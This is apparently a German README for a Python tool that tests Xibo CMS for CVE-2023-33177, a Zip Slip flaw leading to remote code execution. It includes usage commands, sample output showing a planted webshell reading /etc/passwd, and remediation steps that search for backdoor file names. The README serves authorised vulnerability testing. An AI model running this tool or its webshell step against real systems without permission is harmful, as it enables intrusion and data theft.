
Xibo CMS CVE-2023-33177 Schwachstellen-Tester
Automatisiertes Sicherheitstest-Tool für CVE-2023-33177 - Zip Slip Path Traversal Schwachstelle in Xibo CMS, die zu Remote Code Execution (RCE) führt.
Dieses Tool dient nur zu Bildungszwecken und autorisierten Tests. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Unautorisierte Tests sind illegal und unethisch.
Xibo CMS Versionen 1.8.0-2.3.16 und 3.0.0-3.3.4 sind anfällig für einen Pfadangriff über die Layout-Importfunktion. Dieses Tool testet sicher, ob Ihre Xibo-Instanz verwundbar ist, indem es versucht, eine harmlose Testdatei zu schreiben.
## Repository klonen
git clone [email protected]/kaxm23/-CVE-2023-33177-.git
cd xibo-cve-2023-33177-tester
## Abhängigkeiten installieren
pip install -r requirements.txt## -CVE-2023-33177-
Grundlegende Befehlssyntax
python test_cve_2023_33177.py <URL> <Benutzername> <Passwort>
## Lokale Entwicklungsumgebung
python test_cve_2023_33177.py http://localhost/xibo admin password123
## Remote-Produktion mit HTTPS
python test_cve_2023_33177.py https://xibo.example.com [email protected] SecurePass2024!
## Benutzerdefinierter Port und Pfad
python test_cve_2023_33177.py http://192.168.1.100:8080/xibo admin mypassword
## Ohne abschließenden Schrägstrich (Skript behandelt das)
python test_cve_2023_33177.py https://example.com/xibo admin pass
[*] Teste Xibo CMS unter http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test
[+] Test-Payload erstellt: test_vuln_1703123456.zip
[+] Erfolgreich als admin eingeloggt
[*] Versuche, bösartiges Layout zu importieren...
[*] Import-Antwort: HTTP 200
[*] Überprüfe auf Webshell...
[!] VERWUNDBAR! Webshell erreichbar unter: http://localhost/security_test.php
[+] Erfolgreich /etc/passwd gelesen
[*] Ausgabe-Vorschau: VULN_TEST_root:x:0:0:root:/root:/bin/bash...
[!] Website IST VERWUNDBAR für CVE-2023-33177!
[!] Abhilfe: Xibo CMS auf Version 3.3.5+ oder 2.3.17+ aktualisieren
[!] Löschen Sie die Testdatei: security_test.php
[*] Teste Xibo CMS unter http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test
[+] Test-Payload erstellt: test_vuln_1703123456.zip
[+] Erfolgreich als admin eingeloggt
[*] Versuche, bösartiges Layout zu importieren...
[*] Import-Antwort: HTTP 200
[*] Überprüfe auf Webshell...
[-] Webshell nicht gefunden (HTTP 404)
[+] Website scheint NICHT verwundbar (oder Pfad weicht ab)
## Neueste Version herunterladen
wget https://github.com/xibosignage/xibo-cms/releases/latest
## Upgrade-Anleitung befolgen
## https://xibo.org.uk/manual/en/upgrade.html
## Kürzlich geänderte PHP-Dateien im Web-Root finden
find /var/www/html -name "*.php" -mtime -7 -type f
## Nach verdächtigen Dateien suchen
find /var/www/html -name "shell.php" -o -name "cmd.php" -o -name "backdoor.php"
## Zugriffsprotokolle auf nicht autorisierte Importe überprüfen
grep "layout/import" /var/log/apache2/access.log
Alle CMS-Benutzerpasswörter ändern
API-Schlüssel und Tokens rotieren
Nicht autorisierte Benutzerkonten überprüfen und entfernen
`
📋 Anforderungen
Python 3.6 oder höher
requests-Bibliothek (über pip installieren)
Gültige Xibo CMS-Anmeldeinformationen (Authentifizierung erforderlich)
Netzwerkzugriff auf die Ziel-Xibo-Instanz
Repository forken
Einen Feature-Branch erstellen: git checkout -b feature/amazing-feature
Änderungen committen: git commit -m 'Tolle Funktion hinzugefügt'
Branch pushen: git push origin feature/amazing-feature
Einen Pull-Request öffnen
Beitragsanforderungen
Der Code muss den PEP 8-Standards entsprechen
Tests müssen nicht-destruktiv bleiben
Dokumentation muss aktualisiert werden
Keine Live-Tests gegen nicht autorisierte Ziele
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
⚖️ Rechtliche & Ethische Nutzung
Durch die Nutzung dieses Tools stimmen Sie zu:
Nur Systeme zu testen, die Ihnen gehören oder für die Sie ausdrückliche schriftliche Erlaubnis zum Testen haben
Alle lokalen, bundesstaatlichen und nationalen Gesetze einzuhalten
Dieses Tool nicht für böswillige Zwecke zu verwenden
Schwachstellen verantwortungsbewusst an die Hersteller zu melden
Die volle Verantwortung für Ihre Handlungen zu übernehmen
CVE-2023-33177 NVD-Eintrag
Xibo-Sicherheitshinweise
Zip Slip-Schwachstellendetails
OWASP-Pfadangriff-Leitfaden
Probleme: GitHub Issues
Sicherheitsmeldungen: Bitte verantwortungsbewusst über die private Schwachstellenmeldung von GitHub melden
Fragen: Diskussion auf GitHub eröffnen
Wenn dieses Tool Ihnen geholfen hat, ziehen Sie bitte in Betracht, dem Repository einen Stern zu geben!